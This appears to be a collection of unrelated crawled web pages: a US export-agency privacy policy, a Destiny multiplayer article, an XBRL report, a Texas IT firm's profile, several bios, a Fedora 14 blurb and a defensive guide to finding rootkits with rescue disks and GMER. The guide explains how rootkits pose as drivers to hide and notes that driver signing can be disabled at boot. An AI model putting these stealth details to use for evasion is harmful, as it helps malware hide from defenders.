Office of Technology Evaluation (OTE)Transshipment Best PracticesData Mining and System EffectivenessBIS/Census AES Compliance TrainingTechnology AssessmentsIndustrial Base AssessmentsOpportunities for Industrial Base Partnerships and Assistance ProgramsSection 232 InvestigationsTechnical Advisory Committees (TAC)Contact Information
BIS Privacy Policy Statement | Print | The kinds of information BIS collects
Automatic Collections - BIS Web servers automatically collect the following information:
The IP address of the computer from which you visit our sites and, if available, the domain name assigned to that IP address;
The type of browser and operating system used to visit our Web sites;
The date and time of your visit;
The Internet address of the Web site from which you linked to our sites; and
The pages you visit.
In addition, when you use our search tool our affiliate, USA.gov, automatically collects information on the search terms you enter. No personally identifiable information is collected by USA.gov.
This information is collected to enable BIS to provide better service to our users. The information is used only for aggregate traffic data and not used to track individual users. For example, browser identification can help us improve the functionality and format of our Web site.
Submitted Information: BIS collects information you provide through e-mail and Web forms. We do not collect personally identifiable information (e.g., name, address, phone number, e-mail address) unless you provide it to us. In all cases, the information collected is used to respond to user inquiries or to provide services requested by our users. Any information you provide to us through one of our Web forms is removed from our Web servers within seconds thereby increasing the protection for this information.
Privacy Act System of Records: Some of the information submitted to BIS may be maintained and retrieved based upon personal identifiers (name, e-mail addresses, etc.). In instances where a Privacy Act System of Records exists, information regarding your rights under the Privacy Act is provided on the page where this information is collected.
Consent to Information Collection and Sharing: All the information users submit to BIS is done on a voluntary basis. When a user clicks the "Submit" button on any of the Web forms found on BIS's sites, they are indicating they are aware of the BIS Privacy Policy provisions and voluntarily consent to the conditions outlined therein.
How long the information is retained: We destroy the information we collect when the purpose for which it was provided has been fulfilled unless we are required to keep it longer by statute, policy, or both. For example, under BIS's records retention schedule, any information submitted to obtain an export license must be retained for seven years.
How the information is used: The information BIS collects is used for a variety of purposes (e.g., for export license applications, to respond to requests for information about our regulations and policies, and to fill orders for BIS forms). We make every effort to disclose clearly how information is used at the point where it is collected and allow our Web site user to determine whether they wish to provide the information.
Sharing with other Federal agencies: BIS may share information received from its Web sites with other Federal agencies as needed to effectively implement and enforce its export control and other authorities. For example, BIS shares export license application information with the Departments of State, Defense, and Energy as part of the interagency license review process.
In addition, if a breach of our IT security protections were to occur, the information collected by our servers and staff could be shared with appropriate law enforcement and homeland security officials.
The conditions under which the information may be made available to the public: Information we receive through our Web sites is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. For example, BIS policy is to share information which is of general interest, such as frequently asked questions about our regulations, but only after removing personal or proprietary data. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
How e-mail is handled: We use information you send us by e-mail only for the purpose for which it is submitted (e.g., to answer a question, to send information, or to process an export license application). In addition, if you do supply us with personally identifying information, it is only used to respond to your request (e.g., addressing a package to send you export control forms or booklets) or to provide a service you are requesting (e.g., e-mail notifications). Information we receive by e-mail is disclosed to the public only pursuant to the laws and policies governing the dissemination of information. However, information submitted to BIS becomes an agency record and therefore might be subject to a Freedom of Information Act request.
The use of "cookies": BIS does not use "persistent cookies" or tracking technology to track personally identifiable information about visitors to its Web sites.
Information Protection: Our sites have security measures in place to protect against the loss, misuse, or alteration of the information on our Web sites. We also provide Secure Socket Layer protection for user-submitted information to our Web servers via Web forms. In addition, staff is on-site and continually monitor our Web sites for possible security threats.
Links to Other Web Sites: Some of our Web pages contain links to Web sites outside of the Bureau of Industry and Security, including those of other federal agencies, state and local governments, and private organizations. Please be aware that when you follow a link to another site, you are then subject to the privacy policies of the new site.
Further Information: If you have specific questions about BIS' Web information collection and retention practices, please use the form provided.
Policy Updated: April 6th, 2015 10:00am | 计算机 |
2015-48/3674/en_head.json.gz/12913 | Bungie Details ‘Destiny’s Seamless Matchmaking for Multiplayer
By Anthony Taormina | 2 years ago There’s no denying that, given their experience with the Halo franchise, developer Bungie knows multiplayer, both cooperative and competitive. Similarly, they have quite a bit of experience with creating huge sprawling, sci-fi worlds.
It is with those two ideas in mind that we bring more news regarding Destiny, Bungie‘s forthcoming multiplatform, multiplayer-focused title. Specifically, we have new details regarding the game’s seamless multiplayer interactions, on both the cooperative and competitive fronts.
While many games use a centralized server with a player limit to support multiplayer experiences, Bungie is going a different direction with Destiny. Instead, the developer is using what they are calling “mesh networking” to populate the game’s various play areas.
Using these mesh networks, players will always have companions to interact with regardless of where they are in the world of Destiny. In an ideal world, players will never encounter an area that feels empty.
“What happens is everybody in the world can play together. There aren’t these barriers that are in place. You’re all playing in one connected online world. When you’re moving from location to location you’re always going to have people to play with because there’s this huge population. You never have to go to an area of the world that’s deserted because there happens to be no one here on the server at this time.”
How Bungie plans to execute this seamless multiplayer experience isn’t entirely revealed, but, as Technical Director Chris Butcher explains, the next-gen consoles do a substantial amount of the legwork for Bungie.
“For us we’ve kind of said we want this game world to be able to work with millions of players online at once. And that means playing to the strengths of the consoles. Being able to use these very powerful machines to run a lot of the simulation. Being able to use the servers in a seamless fashion so that as you’re moving from place to place you’re switching networks with all of the different people that are around you. You’ve got a very high quality fast action gameplay experience. If you have all of these calculations taking place in a central server that’s one place in the world you can’t really have a fast action experience.”
However, although Bungie is playing to the strengths of the Xbox One and the PS4, that doesn’t mean the past-gen versions will be slouches either. As Butcher explains, Bungie has optimized the Destiny engine very well, to the point they can still generate a comparable experience on the Xbox 360 and PS3. Granted, they are using almost every ounce of those machines, but those gamers who have yet to upgrade to the next generation will be pleased to know their experience won’t be diminished.
While most of the talk regarding Destiny was focused on the game’s cooperative elements, there were also a few competitive multiplayer details revealed as well. For example, Butcher explains that although some players might be mismatched with stronger, or higher level, players, there will always be an incentive to finish a match. That might be in the form of better rewards or simple recognition that you can hold your own against higher level players.
“If you’re kind of in an underdog type of situation, then we make sure that we give you both the investment rewards, but also call out that you’re doing a really good job in this particular match. For example, when we play in the studio playtests there is always the guy that has the sniper rifle and likes to sit up high. So he’s getting a lot of kills and that’s really satisfying for you to take him down. Maybe you get three kills on him over the course of the match but it’s satisfying to you and the game rewards you for doing it because you’re an underdog in that situation.”
Ultimately, Bungie wants the competitive multiplayer matchmaking to keep things even, but if there are mis-matched opponents it’s nice to know there are still incentives to see the game through.
With one of the largest development teams on record, Destiny is poised to make a huge splash in September of this year. Yes, the game took some time to finally coalesce into something real — in fact, the game was at one point envisioned as a third person shooter — but what Bungie settled holds a ton of promise. But more importantly, the game is trying to push the boundaries of the multiplayer experience – to give players something that, if it works, will be practically seamless. We can’t wait for the beta, which hits Sony platforms first.
What do you think of Bungie’s approach to matchmaking in Destiny? Do you have any concerns?
Destiny releases September 9, 2014 for the PS3, PS4, Xbox 360, and Xbox One.
Source: Game Informer
Activision, Bungie, Destiny, PS3, PS4, Xbox 360, Xbox One Game Title
PS3, PS4, Xbox 360, Xbox One Publisher
Activision Developer
Bungie Release
Sep 09, 2014 Trending Topics | 计算机 |
2015-48/3674/en_head.json.gz/13182 | New language transforms business reporting
"It's about better, faster and cheaper business reporting," says Olivier Servais, director of the IST project XBRL Europe. "This was once done with proprietary electronic formats. XBRL (eXtensible Business Reporting Language) is an open standard that brings a common understanding, vocabulary and method to financial statements."
Unlike Hypertext Markup Language (HTML), eXtensible Markup Language (XML) neither defines nor limits tags. XBRL is part of the XML family and focuses on business reporting needs, by flagging up everything from net assets to sales. Computers can read these tags, speeding up the preparation, analysis and communication of business information.
External reports are only the iceberg's visible tip. XBRL will soon be used widely for internal company reports, which make up the bulk of business reporting. Within five years it will also be common in the credit risk arena, enabling banks to do away with the manual inputting of customers' financial details.
The language originated in the United States when an accountant began tagging data to facilitate the exchange, comparison and analysis of financial reports. The idea quickly caught on, supported by influential bodies such as the American Institute of Certified Public Accountants. "However," adds Servais, "since our 2004 project launch, the world has largely viewed XBRL as European, because of the numerous first-class XBRL projects here."
The two-year project sought to accelerate the use of XBRL, by increasing awareness and creating user groups. These goals were timely, given the European Union's emerging focus on competitiveness, growth and transparency � not to mention recent worldwide adoption of the International Financial Reporting Standards (IFRS). Indeed, according to Servais, "IFRS and XBRL make a sort of dream team!"
Driven by the project's activities, the language is today widely adopted in Europe with at least one project in each EU Member State. The United Kingdom's Inland Revenue, for example, accepts tax filings in XBRL. All Spanish public companies must now use it when filing with authorities and Belgian companies will follow suit from 2007.
The project organised 120 events across Europe to show how the format can improve people's way of working. Of the 5,000 attendees, several were high-level regulators and national ministers, notes Servais.
He also highlights the creation of national working parties or 'jurisdictions' in eight European countries. Designed to reinforce XBRL use, they bring together public bodies and commercial companies and are led by a neutral, independent party such as a central bank. "This neutrality is important and was a major reason why the European Commission agreed to fund us," he adds.
Early in the project, the partners built contact databases, an intranet and the website. These tools and the newsletter � now distributed to 3,500 people in Europe �strengthened the profile of XBRL. Though the project has ended, the website and newsletter will live on with jurisdiction funding.
Looking ahead, Servais expects most business vendors to have adopted XBRL by the decade's end. He also believes the term will eventually disappear: "It will probably just be called business reporting, when everyone uses it."
XBRL, a worldwide initiative, is being driven to a large extent by Europe. A new organisation known as XBRL Europe, registered in Belgium and part of the umbrella worldwide body XBRL International, will continue the project's work. "Most people have now heard of XBRL," says Servais, "so we'll concentrate on its adoption and implementation, especially by organising training workshops throughout Europe."
Olivier Servais
Director, XBRL Europe
Tel: +32-2-7026482
Source: Based on information from XBRL | 计算机 |
2015-48/3674/en_head.json.gz/13489 | The Top 3 Cost-Cutting Mistakes CIOs Make And How to Avoid Them
The current economic downturn has resulted in contraction of IT Department budgets and a mandate to allocate resources to only the most critical projects, then execute flawlessly.
This paper outlines some bad, but not uncommon tactical reactions to falling budgets, and describes problems those reactions generate. It also recommends a proven alternative for delivering more value with smaller budgets using an Agile and Lean framework that avoids costly project failures, maximizes ROI of projects undertaken, and lets you have a more adaptable and flexible portfolio of projects.
Evan Campbell
Vice President of Professional Services, Rally Software Development With more than 15 years in the software industry, Evan Campbell has had responsibility for Agile transformations from the team level to the boardroom. Prior to joining Rally, he served as Chief Technology Officer and Vice President of Professional Services at SolutionsIQ, a 450-person IT consulting company. In that role, he was responsible for building and leading the company's Agile Software Development Practice, and it's Agile Consulting Practice, among others. As CTO of Versatile Mobile Systems (VMS), a publicly traded software company, he
was responsible for Product Development, Professional Services, and IT. Evan joined VMS as a result of its acquisition of Mobiquity, an e-commerce SaaS company where he was Co-Founder and CTO. Prior to these roles in software companies Evan worked in Corporate IT leading development teams and managing software development and systems integration projects. Evan is a Certified ScrumMaster (CSM) and a Certified Information Systems Auditor (CISA). He holds an MBA from Rollins College and an MA in International Affairs, Economics and Finance from George Washington University. Prior to his career in technology, Evan served in the U.S. Army as an Airborne Ranger and Green Beret.
Vendor: Rally Software | 计算机 |
2015-48/3674/en_head.json.gz/14382 | How to discover hidden rootkits
PC Unearth and remove rootkits using BitDefender's RescueDisk
Shares Once upon a time, viruses were about chaos, destruction and loss of data, but that was before criminal gangs realised that computers could be used to extort and defraud, and could even be used as cyber weapons. For the past decade or so, online crime has continued to evolve faster than the industry that has sprung up to protect us from it. Malware of all kinds is becoming stealthier as the rewards become more lucrative, and today even the most basic botnet client can cover itself in a shroud of invisibility. So how do you detect such an infection and give your network a clean bill of health? This requires deep scanning - far deeper than your normal antivirus software can provide. Rooting around The name 'rootkit' derives from 'root', which is the system administrator's account name on UNIX and Linux-based operating systems, and 'kit', simply meaning a toolkit. Therefore, a rootkit is a toolkit designed to give privileged access to a computer. To understand rootkits properly, it's necessary to see an operating system as a series of concentric security rings. At the centre is the kernel; this is usually called ring zero, and has the highest level of privilege over the operating system and the information it processes. Ring zero is also often referred to as kernel mode. Rings one and two are usually reserved for less privileged processes. If these rings fail, they will only affect any ring three processes that rely on them. Ring three is where user processes reside, and is usually referred to as user mode. Ring three is always subject to a strict hierarchy of privileges. It's interesting to note, however, that debuggers usually run in ring two because they need to be able to pause and inspect the state of user mode processes. Importantly, a process running in a higher privileged ring is able to lower its privileges and run in an outer ring, but this can't work the other way around without the explicit consent of the operating system's security mechanisms. This is known as the principle of least privilege. In cases where such security mechanisms can be avoided, a privilege escalation vulnerability is said to exist. Ring zero (kernel mode) processes, along with the modules that make them up, are responsible for managing the system's resources, CPU, I/O, and modules such as low-level device drivers. Many rootkits are therefore designed to resemble device drivers or other kernel modules. If you want to spy on a computer, or intercept and modify data that doesn't belong to you, the kernel is the place to be. If you want to see everything that's typed into a keyboard, a rootkit that masquerades as the keyboard driver is what you need. To see everything sent to and from the network, a network card driver is the thing to replace. Protection If kernels were simply lumps of code that were compiled by the developer and then never changed until another was released, rootkits would be easier to detect. However, modern operating systems are extensible; they can take advantage of optionally loadable modules. At system bootup, a typical operating system might scan the hardware and only load the modules it needs in order to control that hardware. These modules are therefore very lucrative targets for malicious code writers. If a module can be replaced with one containing a rootkit, it will then be loaded into the kernel and will run in ring zero. To prevent poisoned kernel code from being loaded in 64-bit Windows 7, Microsoft now insists on cryptographic code signing for all loadable modules. A 'hash value' is generated for the module by running its code through an algorithm. Only if the code produces the same hash value as the original code compiled by Microsoft is it loaded and run. Any deviation from the hash value means that the code must have been modified and therefore will not load. However, because some older hardware still uses device drivers that don't support signing (as does some custom hardware), it is possible to bypass device driver signing by pressing [F8] at boot time and selecting the option on the boot menu to disable it. When installing programs in Windows, the user access control prompt that appears is also a potential infection vector. Once you say 'Yes', you're giving privileged access to the operating system - but do you always know what you're installing? If a hacker can convince you to click 'Yes' when you should be saying 'No', your antivirus software can't always save you. This is why it's dangerous to simply install software because a friend sends it to you, and why installing cracked, pirated versions of software can be extremely dangerous. Flexible malware Today, rootkits are an epidemic. As malware, their purpose is not usually directly malicious, but instead they are used to hide malicious code from your operating system and your defences. Being so flexible, rootkits find many uses. For example, rootkits can be used to create and open back doors to operating systems for privileged access, either by command line or via a GUI. Such access allows a potential attacker to browse, steal and modify information at will by subverting and even bypassing existing account authorisation mechanisms. If a rootkit stays on a PC after reboot, it will also allow hackers back into that system with privileged access at a later date. To prevent discovery, once running, rootkits can also actively cloak their presence. How they do this is quite ingenious. Programs such as the Windows Task Manager or Microsoft's alternative Process Explorer both need access to the operating system to report on what's happening. They are user processes, running in ring three with no direct access to the kernel's activities. Instead, they request information via authorised function calls. However, if a rootkit has replaced the part of the kernel servicing those calls, it can return all the information the system monitor wants - except for anything relating to the rootkit. Antivirus programs also use standard system calls, and this is why they are very poor at detecting rootkits on a running system. This ability to operate invisibly within the OS means that a major use of rootkits is to conceal other malware, which might in turn run in the outer rings of operating systems. Some rootkits can even disable antivirus software. It's not unusual to find a highly sophisticated rootkit protecting a fairly simple piece of malware. So, how can they be discovered? Detection time Because a rootkit can actively defend against detection on a running operating system, the only way to be sure that it's not doing so is to prevent it from running. The best way of doing this is to shut down the operating system itself and examine the disk upon which it is installed. Though this is specialised work, many antivirus vendors have woken up to the need for such tools, and now supply them free of charge. We're going to use BitDefender's free RescueDisk, which is supplied as a bootable ISO image ready to be burned onto a bootable DVD. Based on Linux, this boots in place of the computer's operating system and scans the hard disk without any rootkit activity getting in the way. You can download BitDefender's RescueDisk from http://bit.ly/coqNmL. Click the 'BitDefenderRescue CD_v2.0.0_5_10_2010.iso' file to download it, then burn to a DVD. Once this is done, place the DVD in the drive and reboot the computer. After a few seconds, the BitDefender boot menu will appear. Press [Enter], and after a few minutes a graphical desktop will load. BitDefender's software runs automatically from here. Click 'Continue' to start and the software will download and install the latest updates. BitDefender then sets to work examining the disk. The software will run for 15 minutes or more depending on the size of your disk. It scans not only the operating system files but also the boot loader and other files, looking for signs of infection. Provided that any rootkits are listed in the downloaded definition files, this should identify any stealth malware it encounters - including the malware that the rootkit was shielding. Note that as it runs, BitDefender will refer to the C: drive as /media/LocalDisk-0. This is a convention in Linux and refers to the fact that the software mounts the system disk as it would any other storage device. Once you have completed the scan and (hopefully) found nothing, you can switch the system off and on again, remove the disk and boot into Windows. Within Windows Though it's harder to determine whether a running Windows system is infected with a rootkit, it can be done. One solution to this problem is the free utility GMER, which you can download from www.gmer.net. To do so, click 'Files' and then the 'Download EXE' button. This randomises the filename. In theory, any lurking rootkit might be ready to block the GMER executable, but if the filename is random, it will be harder for this to happen. You'll then download a zip file, which Windows Explorer should be able to open. Drag and drop the GMER.exe file to a convenient directory (a USB memory stick is a good option) and then double click it to run. Click 'Scan' and GMER will scan the list of ticked OS items in the right-hand column. This can take a while, but don't be concerned about the long list that appears unless you see something red, which indicates a possible infection. As it scans, GMER also produces information about the running system. To see this information, click the tab marked '> > >'. This opens up several other tabs with the various types of information. Perhaps the most useful of these is the Processes tab. As with other forms of malware, the success of rootkit detection depends on the technology used and the definitions provided by the security vendor, but this isn't always 100 per cent effective. It's therefore highly recommended that you scan your system using the free rescue disks provided by more than one vendor, as a mix of technologies and scanning methods is much more likely to detect rootkits. Related news
Uh oh, the humble USB has a serious security problem
Security predictions for 2015: Shining some light on the invisible threats
How the security threat landscape is shaping up for 2015
Cybersecurity trends and upcoming threats to businesses in 2015
See more PC news Load Comments | 计算机 |
2015-48/3674/en_head.json.gz/14583 | residential service
cat-man-du meets the needs of residential clients as well as business oriented clients. Along with the latest tech news, you can find all the residential services you are looking for by clicking here VISIT OUR PC SITE cat-man-du cat-man-du is the most awarded business tech company in the Texas Panhandle. Providing services ranging from complete workstation development to total network and server deployment, cat-man-du can handle any of your needs. VISIT OUR IT SITE The most awarded and BEST computer service and business IT in Amarillo, Canyon and Dumas
It is the mission of cat-man-du to provide the highest possible levels of customer service and marketplace ethics while building long lasting relationships with our clients. In addition, we strive to earn a modest profit while giving back and supporting not only the communities that we serve but the world that we live in as well.
cat-man-du recruits staff members who are at the top of their game, not only with regards to their technical skills but with interpersonal skills as well. These top-notch team members accomplish our mission by keeping their technical skills honed as well as their relational and customer service skills refined.
To Our Team Members
We strive to provide our Employees (we prefer to call them Team Members and/or Partners) with a fun and stable work environment focused on equal opportunity and a commitment to growth and fulfilment. cat-man-du was founded to be the vehicle that allows our Partners to realize their own dreams and goals. We hire Team Members who are passionate, creative, innovative and goal minded. Above all, Partners are given the same respect, and serving attitude that they are expected to share with our valuable clients. We create a culture of excellence, teamwork, fun coupled with a commitment to one of our mottos:
"Do what you say you're going to do, when you say you're going to do it."
To join the cat-man-du team, visit our career center and upload a resume.
cat-man-du believes we must put our clients' needs first, operate morally and ethically in every situation and be dedicated to providing the best customer experience possible. We will deliver our high-quality skills to our clients in a timely and professional manner and earn a fair profit doing so.
The customer is the reason we exist. We will always provide the best customer service, technical support and business relationships available anywhere.
As a team, we are committed to our clients and to our primary motto: "Everything Matters."
Founder, Acting President/CEO and Board Chairman
As President and CEO of cat-man-du Corporation. Ray Wilson leads the largest and most awarded computer service and IT support company in West Texas. Ray brings over 25 years of business leadership and management to the table with more than 15 years of that time in IT management. Ray has been recognized and awarded by the Amarillo Chamber of Commerce, the BBB, the Amarillo Young Professionals and the Amarillo Independent School District. Ray has also served on the Board of Directors for the Amarillo Chamber of Commerce and the Don Harrington Discovery Center. Ray has a heart for giving and actively supports many charities worldwide. Ray is also a professional musician who has sold his music worldwide.
Amber Wilson
Amber is the Chief Financial Officer of cat-man-du Corporation, a position she has held since 2004. She is responsible for all financial matters for cat-man-du, including Accounting, Internal Audit and Controls, Tax, Treasury and Asset Management. Amber earned her Associates degree in Business Administration from Amarillo College in 2003 and her Bachelor of Business Administration (BBA), Accounting from West Texas A & M University in 2006.
Tony Martin
Executive Vice President, Operations and Regional Supply Chain
Tony is the VP of the daily operations and supply chain management for West Texas. In this role, Tony supports the mission and strategies that are determined by the Board of Directors and the Executive Officers of cat-man-du Corporation. cat-man-du Corporation's Supply Chain is responsible for purchasing millions of dollars worth of inventory, specific client orders, as well as procurement of company supplies and assets. Additionally, Tony's role over operations see's him providing oversight to the West Texas region while he ensures that quality and safety systems are in place, cat-man-du Corporation policy adhesion and that each location is in compliance with State and Federal Laws.
cat-man-du Corporation is the most awarded computer sales and service and Business IT service in West Texas.
Over the years cat-man-du has had the honor of working with thousands of businesses and residents in West Texas, Eastern New Mexico, Oklahoma, Kansas and the DFW area from our three locations in Amarillo, Canyon, and Dumas Texas. With a true desire to solve computer and technology related problems, cat-man-du has become the leader in the Texas Panhandle and beyond when it comes to Information Technology.
cat-man-du Corporation has received the following honors, awards and recognition:
2012 Winner Top Small Business - Amarillo Chamber of Commerce
2010 Winner, Better Business Bureau of the Texas Panhandle's Torch Awards for Marketplace Ethics - Better Business Bureau of the Texas Panhandle
2009 Top 20 Under 40 - Amarillo Chamber of Commerce and the Amarillo YP *Ray Wilson awarded
2009 Finalist, Better Business Bureau of Amarillo's Torch Awards for Marketplace Ethics - Better Business Bureau of Amarillo
2009 Jim Henson Top Small Business of the Year - Amarillo Chamber Of Commerce
2007 Heart For Kids Award - Amarillo Independent School District/AACAL
2006 Finalist, Better Business Bureau of Amarillo's Torch Awards for Marketplace Ethic - Better Business Bureau of Amarillo
ENVIRONMENTAL RESPONSIBILITY & SUSTAINABILITY
At cat-man-du we believe that it has become an essential requirement of doing business responsibly and successfully to pay attention to the impact that we have on our environment and on future generations. As West Texas's largest computer and technology retailer, our actions have the potential to create a better world for generations to come. To accomplish this goal in 2008,we created cat-man-du Green.
What is cat-man-du Green?
cat-man-du Green is the asset recovery division of catmandu, Inc. This division handles the collection and recycling of electronic hardware waste or e-waste produced by cat-man-du, our partners as well as our competitors.
Why spend so much corporate money and energy with cat-man-du Green?
To protect our air, ground, and water supplies and help ensure a future for our children.
A study by the United States Environmental Protection Agency (EPA) has shown that electronics already make up approximately two percent of the municipal solid waste stream, and research indicates that electronic waste is growing at three times the rate of other municipal waste.
In 2011, the US alone generated 3.41 million tons of e-waste. Of this amount, only 850,000 tons or 24.9 % was recycled, according to the EPA (up from 19.6 in 2010). The rest was trashed - in landfills or incinerators.
Electronic circuit boards and batteries can contain hazardous materials, such as lead, mercury and hexavalent chromium. If improperly handled or discarded, these toxins can be released into the environment through landfill leachate or incinerator ash.
What does cat-man-du Green do with e-waste?
cat-man-du Green exercises a zero-landfill policy and abides by the Electronics Recycler's Pledge of True Stewardship. Hardware that has not yet passed its useful end-of-life will be used to build computers that can be sold at a reduced amount. These sales help offset the expenses that the company encours through our "green" efforts. Hardware that has already passed its useful end-of-life will be broken down to base components and shipped to our recycling partners.
Who are cat-man-du's partners?
We currently work with CRC Recycling to make sure that every aspect of the equipment disposal is handled properly. How can I dispose of my hardware and how much does it cost?
Cost to you: zero. Just bring us the hardware.
Contact us today for more details!
cat-man-du FAQ
Where did the name cat-man-du come from?
Our company founder, Ray Wilson, was driving between Amarillo and Dumas one day while performing computer services as a side business when he decided to start the company. He was searching for a name that would both set the company apart from the many competitors and describe the type of company he wanted to create.
A song from 1975 came on the radio by Bob Seger called "Katmandu" that describes not feeling loved where the person is at currently and wanting to go someplace better. Because Ray had been in the technical industry for so long he knew that most customers were unhappy with the service they receive from computer repair companies and IT companies but that they just didn't know of any other alternative. It also dawned on him that he could take three commands used in the Linux OS (cat, man and du) and phonetically pay homage to the Bob Seger song.
He went home that night and created the company logo and name. According to Ray "The name is a pinch of fun, a dash of nerdy and a whole lot of Rock 'n' Roll on a serving platter that puts our clients first and gives them a place to go and receive the service they deserve but can't get at our competitors."
Is cat-man-du a "local" company?
catmandu, Inc. or cat-man-du Corporation is a privately traded Texas "C corporation" founded and based in Randall County Texas, headquartered in Amarillo, Texas. cat-man-du currently has three locations in Amarillo, Canyon and Dumas Texas and serves West Texas as well as Eastern New Mexico, Oklahoma, Kansas and the DFW area.
Does cat-man-du perform computer service for individuals, IT support for business, new computer sales or all three?
In short, all three and more. cat-man-du is staffed with some of the most experienced computer technicians and IT administrators within an 800 mile radius. Our business model is based on building lasting relationships with clients through amazing customer service and dedication to their technology whether is is their home computer and network or a complex business network with multiple servers and hundreds of computer workstations. In order to accomplish this goal we have staffed our locations with technicians and customer support team members that are highly trained in all forms of computer repair and service as well as business IT. In addition, to maintain our business relationships and achieve our company goals, we sell new PCs, tablets, networking equipment, business workstations and servers. The challenge is to partner with a company that we can be proud to place our brand and theirs side by side. To meet this challenge we partnered with the number one PC manufacturer in the world which also has the lowest failure rate coupled with outstanding product support. That company is Lenovo. In addition to being an authorized Lenovo reseller, cat-man-du is also the only authorised service center in West Texas. In addition to partnering with Lenovo, cat-man-du has also partnered with Google in order to offer their Nexus line of tablets and smart phones.
Does cat-man-du offer design, web development, and SEO services?
Yes. cat-man-du can design your entire brand from the ground up. If you need logo design services, full web development, or Search Engine Optimization (SEO) services for an existing site, cat-man-du can help. We also specialize in DRUPAL CMS (Content Management System) development. We can even help you get your company listed in Google Places, Bing Places, and other search databases which will help your prospective clients find you. If you are in need of any of our design and development services you can visit the cat-man-du Digital Marketing Division here.
Is cat-man-du HIPAA Compliant?
Yes. HIPAA privacy rules provide cat-man-du and its technicians with "business associate" rights to limited use and disclosure of the information. cat-man-du never discloses data unless required by law. cat-man-du does not access any portion of the backup data unless authorized for customer support purposes. cat-man-du can be fully prevented from data access by use of the client-side secret encryption key.
HIPAA compliant information systems require a combination of administrative procedures, physical safeguards and technical measures to protect patient information during storage and transmission across communication networks. As a significant part of your overall contingency plan, cat-man-du provides secure, automated data transmission and storage services for data backup and recovery.
cat-man-du implements the following HIPAA compliant features:
- Data security Microsoft EFS encryption - data is ALWAYS compressed and encrypted during transmission and storage
- Data integrity controls with mutual authentication
- Restricted password access - a secret encryption key can be specified for ultimate security
- Off-site storage at secured data servers (DataHealth)
- Extended storage is available at an additional cost per year (HIPAA requires storage for minimum 6 years)
- Optional monthly CD or DVD archives are available
Your Name: Email Address: Message: Amarillo's Best Computer Repair, Business IT, Digital Marketing, and Web Development Company
Contact Us Today For A Quote!
806-350-TECH | 计算机 |
2015-48/3674/en_head.json.gz/14737 | Group NameCreate New GroupClipPatti Freeman EvansVice President, Research Director serving eBusiness & Channel Strategy PROFESSIONALSBlog:
eBusiness & Channel Strategy Blog
Patti serves eBusiness & Channel Strategy Professionals. She is a leading expert on multichannel retail strategy with 19 years of diversified experience, expertise in creating customer-centric eCommerce sites, integrating channels effectively, developing innovative marketing initiatives, and ensuring high-standard customer service and order fulfillment operations.Previous Work ExperiencePatti was formerly a research director at JupiterResearch. Before joining JupiterResearch, she held leadership positions with leading internationally known companies like Bloomingdale's and Godiva Chocolatier. Most recently, she was director of shopping services with bloomingdales.com, where she touched on all aspects of the multichannel retail business. Brought on board to create and launch Bloomingdale's Bridal Registry website with WeddingChannel.com, Patti directed all aspects of the business from concept to implementation, including back-end customer service and store integration issues. In her previous capacities at Bloomingdale's, she led the international marketing department and implemented award-winning multiple-media marketing and retention programs. Further, Patti has done project work to develop interactive educational products for adults and children.
Patti has been quoted in major media outlets such as The Wall Street Journal, The New York Times, The Chicago Tribune, and Business 2.0, as well as in industry publications such as Internet Retailer and Executive Technology. Patti has also appeared on NBC Nightly News, CNBC, BBC, CNN, NPR, PBS, Fox Business News Network, and BNN.
She has taught eCommerce at the Fashion Institute of Technology in New York and is also the vice chairman of the board of directors for Shop.org, a membership organization that serves the online and multichannel retail community and a division of the National Retail Federation.EducationPatti earned a B.A. in business management and studio art from Franklin and Marshall College.(Read Full Bio)(Less)275Research CoverageB2C eCommerce, Commerce Solutions, Dell, Digital Marketing, Direct Marketing, eCommerce, eCommerce Adoption, Multichannel Selling Strategies, Omnichannel Retail, Retail, Social Marketing, Social Media... (More) | 计算机 |
2015-48/3675/en_head.json.gz/2498 | release date:Nov. 2, 2010
The Fedora Project is a Red Hat sponsored and community-supported open source project. It is also a proving ground for new technology that may eventually make its way into Red Hat products. It is not a supported product of Red Hat, Inc.
The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from free software. Development will be done in a public forum. The Red Hat engineering team will continue to participate in the building of Fedora and will invite and encourage more outside participation than was possible in Red Hat Linux. By using this more open process, The Fedora Linux project hopes to provide an operating system that uses free software development practices and is more appealing to the open source community. Fedora 14, code name 'Laughlin', is now available for download. What's new? Load and save images faster with libjpeg-turbo; Spice (Simple Protocol for Independent Computing Environments) with an enhanced remote desktop experience; support for D, a systems programming language combining the power and high performance of C and C++ with the programmer productivity of modern languages such as Ruby and Python; GNUStep, a GUI framework based of the Objective-C programming language; easy migration of Xen virtual machines to KVM virtual machines with virt-v2v...." manufacturer website
1 DVD for installation on x86_64 platform back to top | 计算机 |
2015-48/3675/en_head.json.gz/4827 | TRON Project Leader Ken Sakamura
Ken Sakamura is Professor of Information Science at the University of
Tokyo, where he also serves as the Executive Director of the university's
newly established Digital Museum. He's most famous as the originator, chief
architect, and principle driving force behind the TRON Project. But in addition,
he's an architect of buildings, a designer of computerized gadgets that
defy the imagination, a consultant for technology projects in countries
around the globe--which is not to mention Japan--and he's an author and
editor of numerous computer-related books and magazines.
Professor Sakamura was born in Tokyo on July 25, 1951, which means he
reached young adulthood just as Japan's "electronics boom" and
"calculator wars" were starting to take place. Hopelessly fascinated
by electronics, after graduating from high school, he enrolled in the Department
of Electrical Engineering at Keio University from which he ultimately received
his Ph.D. in 1979. He then entered the University of Tokyo as a teaching
assistant in the Department of Information Science, and shortly afterwards
he got his big break--he was asked by the Japan Electronic Industrial Development
Association (JEIDA) to chair the Microcomputer Software Applications Experts
Committee, the goal of which was to decide what Japan should do about the
"microprocessor revolution" that had started to take place.
Unbeknownst to JEIDA officials at the time, Ken Sakamura is one "unusual
Japanese," a man driven to do with computers what no man--or woman
for that matter!--has done before. In fact, he could probably be best thought
of as a citizen of Computopia first, and a Japanese second, or maybe Japan's
ultimate "gadgeteer" who migrated from the future into the present.
Whatever, he took the sleepy committee, which probably would have produced
a ho hum report under someone else, and turned it into a launching pad to
rocket Japan into the forefront of computer architecture development. As
a result of his efforts, Japan has created two de facto real-time operating
system standards--the ITRON and CTRON architectures, both of which are "open
architectures"--and there is an excellent chance that a third de facto
standard will emerge from the indefatigable efforts to turn the BTRON architecture,
which is also an "open architecture," into a platform for advanced
personal computing applications.
Although Professor Sakamura is defensive of Japan and doesn't want to
see trade negotiators from foreign countries secure bilateral deals with
